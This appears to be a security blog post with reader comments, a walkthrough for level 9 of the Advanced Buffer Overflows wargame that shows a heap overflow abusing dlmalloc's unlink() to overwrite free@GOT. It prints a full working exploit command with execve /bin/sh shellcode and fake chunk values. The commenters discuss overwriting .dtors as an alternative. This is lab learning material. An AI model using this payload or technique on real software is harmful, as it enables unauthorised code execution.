Advanced Buffer Overflows: Defeating #9

After the fun-and-go! session in the previous post it didn't take too long to create a exploit for this kind of situation. Today I present the solution for the 9th level of the Advanced Buffer Overflows challenge which deals with free() and a dlmalloc implementation. First of all, lets take a look at the C source:
int main(int argv,char **argc) {
char *pbuf1=(char*)malloc(256);
char *pbuf2=(char*)malloc(256);


In my particular case I changed gets() for strpy() using the call parameters as input vector to ease data input and exploitment, which doesn't alter the bug in any way. This level is textbook example of a Heap Buffer Overflow situation in which we fool the implementation and the unlink() macro to overwrite arbitrary bytes in memory.

As explained in our last post, we need to create a fake chunk header in one of our buffers and fool free() to unlink() it. For this purpose we will overwrite the chunk header of buf2 so that calculations will lead the implementation to our fake chunk header. We will overwrite the prev_size field so that when _int_free() calculates the address of the previous chunk, it gets to our fake chunk header. Instead of making a step-by-step debugging session, I will explain the key instructions where data flow gets manipulated. Remember you can grab the disassembly here.

First let's begin by showing how the call will be so that we can identify the data we're analizing. Note in this call that the sub-sequence in blue is where our overflow begins and this 8 bytes will eventually fill the chunk header for buf2:

[infi@localhost insecure]$ ./abo9 `python -c 'print "\xeb\x0e"+"A"*14+"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"A"*188+"\xff\xff\xff\xff"+"A"*8+"\xf8\xff\xff\xff"+"\xf0\xff\xff\xff"+"\xff\xff\xff\xff"*2+"\x9c\x95\x04\x08"+"\x08\x96\x04\x08"'`

In 0x4207446b the address of \xf8\xff\xff\xff gets loaded into ecx and right after that \xf0\xff\xff\xff is copied into eax. At address 0x42074477 eax is copied into esi. One of the critical points comes in 0x420744ad because esi=0xfffffff0 and ecx=0x08049708 get added and the result is stored in eax, which now contains 0x08049718; the theoretical start address of our fake chunk where the theoretical fd and bk pointers are (in red in the call sequence).

Anyway all of that is there just to success some checks, the real magic begins now. At 0x420744c8 edi-8 (the address of buf2) will be stored in eax, thus saving the prev_size field of buf2's chunk header in it. In the next instruction and remembering that ecx holds the address of the prev_size of buf2, ecx = ecx - eax is executed. Now remember that we manipulated the prev_size of buf2 to read 0xfffffff8 (-8), so this will effectively makes ecx point to an address inside buf2, which we can manipulate due to the overflow. ecx now points into 0x08049710, the chunk header of our fake chunk. Since the first 8 bytes of this "unused" buffer are fd and bk pointers our job is kindly completed by unlink() which using offsets 0x8 and 0xc will write 0x08049608 (address of our shellcode, stored in buf1 itself) in 0x0804959c+12=0x080495a8 (address of free@GOT).

That's basically it but a couple of notes here. First of all, shellcode+8 will get clobbered by 0x0804959c , thats how unlink() works. To make the shellcode work properly, we place a unconditional jump in the beginning and jump over the clobbered area, thats why we include "\xeb\x0e"+"A"*14 in the beginning of the shellcode (eb is the opcode for "jmp" and 0x0e=14 is the offset). Also, we need to make sure we overwrite the GOT entry for free() because right after we trick free() into doing this, it gets called once again over buf1, and after manipulating headers this way, the program crashes with a segment violation signal.

I hope this little walktrough enlightened somebody as just did with me. For any suggestion, question or whatever don't hesitate to drop a comment or write an email. See you next time and keep adding NOPs!


TuXeD said...

Just a quick note on it.

Besides overwriting the GOT entry for free(), it is also possible to exploit such a bug by overwriting the .dtors section and introducing the address of your shellcode in there.

For instance, this paper (which I just found using google and never read) talks about it: http://www.infosecwriters.com/texts.php?op=display&id=19

Keep on adding NOPs, it's a nice blog to read and I'm looking forward to read more info on advanced topics here :)

infi said...

First of all thanks for the feedback and note that I'm very glad for it.

I've taken a look at the paper and althought I'll try to make some research on it my first guess is as follows: Overwriting the .dtors section looks feasible but for that to be possible we need to alter the buffer and move it towards the middle-late position of the buffer(It's on the beginning of it in this example).

Since free() is called on buf1, the first 8 bytes need to be free-of-use for us because pointers will be moved around there and when execution gets there through .dtors, the first 8 bytes(which in our exploit make for the "jmp") will be clobbered by the traditional way free works. Hence, when the .dtors section gets there's no executable code is waiting but garbage from malloc management.

Thats the idea that first pops into my mind, but as I said I'll try to get a more hands-on answer. Thanks again for taking the time to elaborate on that, hope to see you around again! :-)

TuXeD said...

mmm maybe I'm not getting exactly what you say, but as far as I can see overwriting .dtors is exactly the same as overwriting the GOT.

I.e., you just place the .dtor's address minus 12 in one of the pointer, your shellcode's address minus 8 in the other one, and you start your shellcode with something like [jump over garbage][garbage][the actual shellcode] so that the garbage is clobbered.

I'm just taking it from the top of my mind, but I'm pretty sure I've used this technique when learning about heap overflows a while ago.

infi said...

What I meant to say is that in the paper, the author places the shellcode towards the mid-late area of buf1 and thus the early area (where fd and bk are stored once its freed) is free for malloc manipulation, which in my particular exploit wasn't the case. I thought malloc would smash the beginning of the shellcode when executing free(buf1) and when .dtors redirected execution towards buf1, the area would be trashed.

I just made some tests to prove my concept but didn't work out. Perhaps Im missing something here. I manage to overwrite the .dtors section but when free(buf1) happens, _int_free() crashes with a SIGSEGV when performing unlink() because edi holds 0xffffffff (-1).

I guess this needs a deeper analysis, I leave that for some time in the future. Yet again, thanks for showing interest in the matter and contributing :-)